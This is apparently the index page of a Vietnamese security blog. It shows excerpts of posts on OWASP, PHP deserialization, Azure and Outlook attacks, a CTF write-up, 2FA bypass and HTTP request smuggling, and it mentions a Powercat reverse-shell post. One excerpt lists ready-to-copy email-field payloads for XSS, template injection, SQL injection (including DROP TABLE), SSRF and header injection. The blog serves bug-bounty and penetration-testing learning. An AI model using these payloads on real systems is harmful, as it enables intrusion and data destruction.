Nhat Truong

Tóm tắt OWASP

OWASP Top 10 là một tài liệu tiêu chuẩn nâng cao nhận thức cho các developer và các nhà bảo mật. Hàng năm, tổ chức OWASP sẽ đi thu thập các thông tin về số lượng các loại lỗ hổng được khai thác nhiều nhất trên thế giới, và tổng hợp lại thành bộ OWASPContinue reading “Tóm tắt OWASP”

PHP Object Injection a.k.a PHP Insecure Deserialization

Ở PHP lổ hổng deserialization còn được gọi là PHP object injection. Để có thể hiểu về vấn đề này, trước tiên ta phải biết PHP serialize và deserialize một đối tượng như thế nào.PHP có 2 hàm là serialize() và unserialize() đảm nhận 2 nhiệm vụ này. Ví dụ serialize object User: Kết quảContinue reading “PHP Object Injection a.k.a PHP Insecure Deserialization”

[Bug Bounty]Một số payload khi test trường email

Chép lại cho các ông copy nhé, nhất các ông :v XSS test+(alert(0))@example.comtest@example(alert(0)).com“alert(0)”@example.com Template injection “<%=7*7%>”@example.comtest+(${{7*7}})@example.com SQLi “‘OR1=1–‘”@example.com“mail’);DROP TABLE users;–“@example.com SSRF john.doe@abc123.burpcollaborator.netjohn.doe@[127.0.0.1] Parameter pollution victim&email=attacker@example.com (Email) Header injection “%0d%0aContent-Length:%200%0d%0a%0d%0a”@example.com“recicpient@test.com>\r\nRCPT TO:<victim+”@test.com

Reverseshell-Powercat-v2

Con hàng backconnect cơ bản, dùng khá okela, khá mượt. Link download: Muốn biến powershell thành exe thì dùng: Lưu ý: máy chủ C&C phải mở hai port.

[Azure RedTeam] Tấn công “Ủy quyền Bất Hợp Pháp”(Illicit Consent Attack) trên Azure

Giới thiệu Azure App Service là một dịch vụ dựa trên HTTP để lưu trữ các ứng dụng web, API REST và mobile backends. Bạn có thể phát triển các ứng dụng bằng ngôn ngữ lập trình yêu thích của mình, chẳng hạn như .NET, .NET Core, Java, Ruby, Node.js, PHP hoặc Python. Các ứngContinue reading “[Azure RedTeam] Tấn công “Ủy quyền Bất Hợp Pháp”(Illicit Consent Attack) trên Azure”

Install các công cụ cần thiết tương tác với Azure

Install AzureAD Install Az Powershell Install Azure CLI

Outlook Form/Rule attack cheat sheet

Bài viết ngắn gọn cho tấn công Outlook form/rule attack, cách sử dụng công cụ ruler. Nguyên lý của tấn công này là tất cả các rule, custom form đều sẽ được đồng bộ nên có thể đăng nhập ở bất kỳ máy nào để thiết lập script độc hại. Đọc thêm: Công cụ LinkContinue reading “Outlook Form/Rule attack cheat sheet”

[Write-up] Cửa hàng đồ chơi Quận 4 – Junior Hacking Talents

link: https://junior.ctflag.asia/challenges 1 “select username from users where username=’\’ and password=’malicious command– -‘” Tham khảo:

[Bugbounty Mindset Series] 2FA Bypass

Về mặt quản lý phiên: Về mặt Logic: Về mặt vượt ngưỡng: Khác: Tham khảo: twitter.com/hackerscrolls/status/1256276376019230720

HTTP Request Smuggling toàn tập

I. HTTP request smuggling là gì? HTTP Request Smuggling là một kỹ thuật khai thác sự bất đồng bộ xử lý gói tin HTTP giữa máy chủ proxy/balancer/… với máy chủ web/backend. Lỗ hổng này thường gây ra các ảnh hưởng rất nghiệp trọng tới logic web thông thường. OK chúng ta sẽ cùng tìmContinue reading “HTTP Request Smuggling toàn tập”